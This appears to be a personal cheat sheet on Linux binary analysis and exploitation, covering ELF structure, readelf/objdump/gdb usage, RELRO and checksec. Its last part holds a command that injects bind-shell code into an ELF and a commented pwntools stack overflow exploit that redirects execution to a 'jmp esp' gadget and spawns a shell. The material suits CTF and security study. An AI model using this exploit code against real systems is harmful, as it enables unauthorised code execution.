[linux] binary analysis & pwn
Intro
Resources
Compact ASCII tables
Example Reference Code
{% highlight c hl_lines="1 3 4" %}
#include <stdio.h>

#define FORMAT_STRING "%s"
#define MESSAGE "Hello Pizza!\n"

int main(int argc, char *argv[]) {
    printf(FORMAT_STRING, MESSAGE);
    return 0;
}
{% endhighlight %}
Compilation Steps
PREPROCESSING -> COMPILING -> ASSEMBLING -> LINKING
- C Preprocessing - stops after the preprocessing stage and prints the source with macros expanded and includes inlined
$ gcc -E -P <source_file>.c > <preprocessing_output>.i
- Compilation - generates assembly code (Intel syntax)
$ gcc -S -masm=intel <source_file>.c
- Assembling - generates an object file (machine code)
$ gcc -c <source_file>.c
- Linking - combines all object files and static libraries into a single binary
$ gcc <source_file>.c -o <filename>.out
Resulting files
<filename>.i ; preprocessed source
<filename>.s ; assembly code
<filename>.o ; object file
<filename>.out ; binary executable
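The four stages can also be scripted one at a time. The sketch below only builds the gcc command lines for a given source file and prints them; it does not run gcc. The helper name `stage_commands` is hypothetical, and `-o` is used for every stage instead of shell redirection (an assumption made for illustration).

```python
import shlex
from pathlib import Path


def stage_commands(source: str) -> dict[str, list[str]]:
    """Return one gcc command line per compilation stage for `source`."""
    stem = Path(source).stem
    return {
        # Stop after preprocessing; -P omits linemarkers from the output.
        "preprocessing": ["gcc", "-E", "-P", source, "-o", f"{stem}.i"],
        # Stop after compilation proper; emit Intel-syntax assembly.
        "compiling": ["gcc", "-S", "-masm=intel", source, "-o", f"{stem}.s"],
        # Stop after assembling; emit a relocatable object file.
        "assembling": ["gcc", "-c", source, "-o", f"{stem}.o"],
        # Run every stage, including the final link step.
        "linking": ["gcc", source, "-o", f"{stem}.out"],
    }


# Print the commands for a hypothetical hello.c (nothing is executed).
for stage, argv in stage_commands("hello.c").items():
    print(f"{stage:>13}: {shlex.join(argv)}")
```

Each list can be passed to `subprocess.run(argv, check=True)` on a machine where gcc is installed.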
ELF Sections
.init Contains initialization code; it is the first code to run at startup, before control reaches the main entry point.
.fini Counterpart of .init: contains finalization code that runs when the program terminates.
.text It contains the main program code. This section is executable but not writable.
.rodata It stores constant data such as string literals and is read-only.
.data It stores the default values of initialized variables and is writable.
.bss It reserves space for uninitialized variables and is writable.
.got GOT, or Global Offset Table. It holds relocations regarding global variables, which are resolved once, at runtime.
.got.plt It holds the entries for the absolute addresses of functions and works together with .plt when resolving those references. It is similar to the regular .got; historically the two were a single section, and the split was introduced to mitigate the security weakness of a runtime-writable .got. However, .got.plt stays runtime-writable when partial RELRO is enabled and becomes runtime read-only only when full RELRO is enabled.
.plt PLT, or Procedure Linkage Table. It consists of stubs of a well-defined format, made for directing calls from the .text section to the appropriate invoked library location.
.plt.got This alternative PLT is used when full RELRO is enabled by passing the ld option -z now at link time, which tells the dynamic linker to use "now binding" (resolve all symbols at load time).
.rel Contains information used by the linker when doing static or dynamic relocations.
.dynamic It tells the OS and dynamic linker how to load and set up the binary.
.init_array Contains pointers to constructor functions that run during startup (formerly known as .ctors).
.fini_array Contains pointers to destructor functions that run during termination (formerly known as .dtors).
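The writable and executable properties mentioned above are recorded in each section header's `sh_flags` field. As a rough illustration, the sketch below decodes the three most common flag bits into the W/A/X letters that `readelf --sections` prints. The per-section flag values are the ones typically seen for these sections and are assumed here, not read from a real binary.

```python
# Section flag bits as defined by the ELF specification.
SHF_WRITE = 0x1      # section is writable at run time
SHF_ALLOC = 0x2      # section occupies memory at run time
SHF_EXECINSTR = 0x4  # section contains executable instructions


def flag_letters(sh_flags: int) -> str:
    """Render sh_flags using the W/A/X letters shown by readelf."""
    letters = ""
    if sh_flags & SHF_WRITE:
        letters += "W"
    if sh_flags & SHF_ALLOC:
        letters += "A"
    if sh_flags & SHF_EXECINSTR:
        letters += "X"
    return letters


# Typical flag values (assumed for illustration).
typical = {".text": 0x6, ".rodata": 0x2, ".data": 0x3, ".bss": 0x3}
for name, flags in typical.items():
    print(f"{name:<8} {flag_letters(flags)}")
```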
ELF static analysis
ELF header
- dump ELF’s header
$ readelf -h <filename>
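To see where a few of the values reported by `readelf -h` come from, the sketch below decodes the first 20 bytes of an ELF header by hand. The function name `summarize_elf_header` is hypothetical, and the sample bytes are synthetic (an assumed ELF64, little-endian, DYN, x86-64 header), not taken from a real file.

```python
import struct

ELF_CLASS = {1: "ELF32", 2: "ELF64"}
ELF_DATA = {1: "little endian", 2: "big endian"}
ELF_TYPE = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}


def summarize_elf_header(header: bytes) -> dict:
    """Decode the magic, class, data encoding, type and machine fields."""
    if header[:4] != b"\x7fELF":
        raise ValueError("bad magic bytes: not an ELF file")
    ei_class, ei_data = header[4], header[5]
    byte_order = ">" if ei_data == 2 else "<"
    # e_type and e_machine are 16-bit fields right after the 16-byte e_ident.
    e_type, e_machine = struct.unpack_from(byte_order + "HH", header, 16)
    return {
        "class": ELF_CLASS.get(ei_class, "unknown"),
        "data": ELF_DATA.get(ei_data, "unknown"),
        "type": ELF_TYPE.get(e_type, "unknown"),
        "machine": e_machine,
    }


# Synthetic header (assumed values): ELF64, little endian, DYN, machine 62.
sample = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8) + struct.pack("<HH", 3, 62)
print(summarize_elf_header(sample))
# For a real file: summarize_elf_header(open(path, "rb").read(20))
```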
Symbols
- non stripped binary
$ readelf --syms <filename>.out
- stripping symbols from a binary
$ strip --strip-all <filename>.out
$ readelf --syms <filename>.out
Sections
- dump all ELF’s sections information
$ readelf --sections --wide <filename>.out
- dump the .plt section
$ objdump -M intel --section .plt -d <filename>.out
- dump the relocs
$ readelf --relocs <filename>.out
Program headers
- dump all ELF’s program headers information
$ readelf --segments --wide <filename>.out
Binary Inspection/Forensic
- Check magic bytes to obtain file type
$ file <filename>
- base64 decode
$ base64 -d <encoded_file> > <decoded_file>
- uncompress preview
$ file -z <compressed_file>
- uncompress file
$ tar xvzf <compressed_file>
- find library dependencies
$ ldd <filename>
- dump hex first 128 bytes
$ xxd -l 128 <filename>
- dump binary first 128 bytes
$ xxd -b -l 128 <filename>
- dump 128 bytes starting at offset 256 as a C-style header
$ xxd -i -s 256 -l 128 <filename>
- extract a 64-byte ELF header located 52 bytes from the start of the file, one byte at a time
$ dd skip=52 count=64 if=<input_filename> of=<output_filename> bs=1
- Calculate total binary file size given ELF header only
total_size = elf_section_header_offset + (elf_section_headers_count * elf_section_header_size)
- List symbols from object file
$ nm <filename>
- List and demangle dynamic symbols from stripped object file
$ nm -D --demangle <filename>
- Add current path to the linker environment
$ export LD_LIBRARY_PATH=`pwd`
- Trace system calls
$ strace <filename>
- Trace library calls while demangling C++ functions and printing the instruction pointer
$ ltrace -i -C <filename>
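The total-size formula in the list above (section header offset plus section header count times section header size) can be evaluated directly from the header bytes. The sketch below reads `e_shoff`, `e_shentsize` and `e_shnum` at their standard ELF32/ELF64 offsets. It assumes, as the formula does, that the section header table is the last thing in the file. The function name and the sample values are hypothetical.

```python
import struct


def elf_total_size(header: bytes) -> int:
    """Estimate the file size as e_shoff + e_shnum * e_shentsize."""
    if header[:4] != b"\x7fELF":
        raise ValueError("bad magic bytes: not an ELF file")
    is_64bit = header[4] == 2
    byte_order = ">" if header[5] == 2 else "<"
    if is_64bit:
        # ELF64: e_shoff at 0x28 (8 bytes), e_shentsize/e_shnum at 0x3A/0x3C.
        (e_shoff,) = struct.unpack_from(byte_order + "Q", header, 0x28)
        e_shentsize, e_shnum = struct.unpack_from(byte_order + "HH", header, 0x3A)
    else:
        # ELF32: e_shoff at 0x20 (4 bytes), e_shentsize/e_shnum at 0x2E/0x30.
        (e_shoff,) = struct.unpack_from(byte_order + "I", header, 0x20)
        e_shentsize, e_shnum = struct.unpack_from(byte_order + "HH", header, 0x2E)
    return e_shoff + e_shnum * e_shentsize


# Synthetic ELF64 header (assumed values): 30 section headers of 64 bytes
# each, starting at file offset 14000.
sample = bytearray(64)
sample[:6] = b"\x7fELF\x02\x01"
struct.pack_into("<Q", sample, 0x28, 14000)
struct.pack_into("<HH", sample, 0x3A, 64, 30)
print(elf_total_size(bytes(sample)))  # 14000 + 30 * 64 = 15920
```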
Disassembling
- simple disassembly of an object file
$ objdump -M intel -d <filename>.o
- check relocations inside the object file
$ readelf --relocs compilation_example.o
- full binary disassembly
$ objdump -M intel -d <filename>.out
ELF dynamic analysis
GDB
- Set a breakpoint
(gdb) b *0x[address]
- Show the registers
(gdb) info registers [specific register]
- Dump a string at memory address
(gdb) x/s 0x[memory_address]
- Dump four hex words at memory address
(gdb) x/4xw 0x[memory_address]
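In `x/4xw`, `4` is the count, `x` the hexadecimal format and `w` the 4-byte word size. The sketch below mimics that interpretation on a bytes object to show how byte order affects the printed words. It is not GDB's implementation, the helper name `hex_words` is hypothetical, and little-endian order is assumed by default as on x86.

```python
import struct


def hex_words(memory: bytes, count: int = 4, little_endian: bool = True) -> list[str]:
    """Interpret the first count*4 bytes as 32-bit words, formatted as hex."""
    fmt = ("<" if little_endian else ">") + f"{count}I"
    words = struct.unpack_from(fmt, memory)
    return [f"0x{word:08x}" for word in words]


# The bytes "baaa" are 62 61 61 61 in memory, read as 0x61616162 on x86.
print(hex_words(b"aaaabaaacaaadaaa"))
```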
Mitigations
Compile-time
- Partial RELRO
gcc -g -Wl,-z,relro -o test testcase.c
- Full RELRO
gcc -g -Wl,-z,relro,-z,now -o test testcase.c
Verify mitigations
- Download checksec [here](https://github.com/slimm609/checksec.sh)
checksec.sh --file [filename]
example output
RELRO      STACK CANARY      NX            PIE      RPATH      RUNPATH      Symbols     FORTIFY  Fortified  Fortifiable  FILE
No RELRO   No canary found   NX disabled   No PIE   No RPATH   No RUNPATH   8 Symbols   No       0          0            start
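The RELRO column can be approximated by hand from `readelf` output: a `GNU_RELRO` program header indicates at least partial RELRO, and a `BIND_NOW`/`NOW` dynamic flag on top of it indicates full RELRO. The sketch below applies that rule to text captured from `readelf --segments` and `readelf --dynamic`. It is a simplified heuristic, not checksec's actual code, and the sample strings are abbreviated, illustrative excerpts.

```python
def classify_relro(segments_output: str, dynamic_output: str) -> str:
    """Classify RELRO from readelf --segments / --dynamic text output."""
    if "GNU_RELRO" not in segments_output:
        return "No RELRO"
    # Immediate binding appears as a BIND_NOW entry or as NOW in a FLAGS line.
    bind_now = any(
        "NOW" in line
        for line in dynamic_output.splitlines()
        if "FLAGS" in line or "BIND_NOW" in line
    )
    return "Full RELRO" if bind_now else "Partial RELRO"


# Abbreviated sample excerpts (assumed for illustration).
segments = "  GNU_RELRO      0x002db8 0x0000000000003db8"
dynamic_lazy = " 0x0000000000000001 (NEEDED)   Shared library: [libc.so.6]"
dynamic_now = " 0x000000000000001e (FLAGS)    BIND_NOW"

print(classify_relro("", dynamic_lazy))
print(classify_relro(segments, dynamic_lazy))
print(classify_relro(segments, dynamic_now))
```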
Binary Injection
- Assemble a raw binary (removing any ELF overhead and leaving just the code)
nasm -f bin -o test.bin test.s
- Inject shellcode into an ELF
elfinject ps bindshell.bin ".injected" 0x800000 -1
PWN
Shellcode x86 compilation (NASM)
- Assemble
nasm -f elf32 -o shellcode.o shellcode.nasm
- Link
ld -m elf_i386 -z execstack -o shellcode shellcode.o
pwntools
asm
$ asm nop
90
$ asm 'mov eax, 0xdeadbeef'
b8efbeadde
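The `b8efbeadde` output above can be reproduced by hand: on x86, `mov r32, imm32` is encoded as opcode `0xB8` plus the register number, followed by the 32-bit immediate in little-endian order. The sketch below covers only this one instruction form, without pwntools; the helper name `encode_mov_imm32` is hypothetical.

```python
import struct

# Base opcode for `mov r32, imm32`; the register number is added to it.
MOV_R32_IMM32 = 0xB8
REGISTERS = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3}


def encode_mov_imm32(register: str, value: int) -> bytes:
    """Encode `mov <register>, <value>` for 32-bit x86."""
    opcode = MOV_R32_IMM32 + REGISTERS[register]
    # The immediate is stored least-significant byte first.
    return bytes([opcode]) + struct.pack("<I", value)


print(encode_mov_imm32("eax", 0xDEADBEEF).hex())  # b8efbeadde
```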
disasm
$ asm 'push eax' | disasm
0: 50 push eax
$ asm -c arm 'bx lr' | disasm -c arm
0: e12fff1e bx lr
templates
start
from pwn import *
context.arch = "amd64"
r = process("./filename")
# r = remote("127.0.0.1", 8888)
r.interactive()
basic bof
# Import everything in the pwntools namespace
from pwn import *
# Create an instance of the process to talk to
io = gdb.debug('./challenge')
# Attach a debugger to the process so that we can step through
pause()
# Load a copy of the binary so that we can find a JMP ESP
binary = ELF('./challenge')
# Assemble the byte sequence for 'jmp esp' so we can search for it
jmp_esp = asm('jmp esp')
jmp_esp = next(binary.search(jmp_esp))
log.info("Found jmp esp at %#x" % jmp_esp)
# Overflow the buffer with a cyclic pattern to make it easy to find offsets
#
# If we let the program crash with just the pattern as input, the register
# state will look something like this:
#
# EBP 0x6161616b ('kaaa')
# *ESP 0xff84be30 <-- 'maaanaaaoaaapaaaqaaar...'
# *EIP 0x6161616c ('laaa')
crash = False
if crash:
    pattern = cyclic(512)
    io.sendline(pattern)
    pause()
    sys.exit()
# Fill out the buffer until where we control EIP
exploit = cyclic(cyclic_find(0x6161616c))
# Fill the spot we control EIP with a 'jmp esp'
exploit += pack(jmp_esp)
# Add our shellcode
exploit += asm(shellcraft.sh())
# gets() waits for a newline
io.sendline(exploit)
# Enjoy our shell
io.interactive()
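To see why `cyclic_find(0x6161616c)` yields the offset to EIP, the sketch below rebuilds the pattern without pwntools. It generates a de Bruijn sequence over the lowercase alphabet with 4-byte subsequences, which is assumed to match pwntools' defaults, and looks up the little-endian bytes of the crashed register value. The `_sketch` names, the return address and the placeholder shellcode byte are hypothetical.

```python
import itertools
import string
import struct


def de_bruijn(alphabet: str, n: int):
    """Lazily yield a de Bruijn sequence in which every n-gram is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for index in a[1:p + 1]:
                    yield alphabet[index]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic_sketch(length: int) -> bytes:
    """Return the first `length` bytes of the pattern."""
    chars = itertools.islice(de_bruijn(string.ascii_lowercase, 4), length)
    return "".join(chars).encode()


def cyclic_find_sketch(value: int, length: int = 512) -> int:
    """Offset of a 32-bit register value (little endian) in the pattern."""
    return cyclic_sketch(length).find(struct.pack("<I", value))


offset = cyclic_find_sketch(0x6161616C)  # EIP held 'laaa' in the crash
print(cyclic_sketch(16), offset)

# Payload layout: padding, return address, then shellcode.
hypothetical_jmp_esp = 0x08041234  # placeholder address, not from a real binary
payload = cyclic_sketch(offset) + struct.pack("<I", hypothetical_jmp_esp) + b"\xcc"
print(len(payload))
```

The shellcode lands exactly where ESP points after the return, which is why a `jmp esp` gadget is enough to reach it.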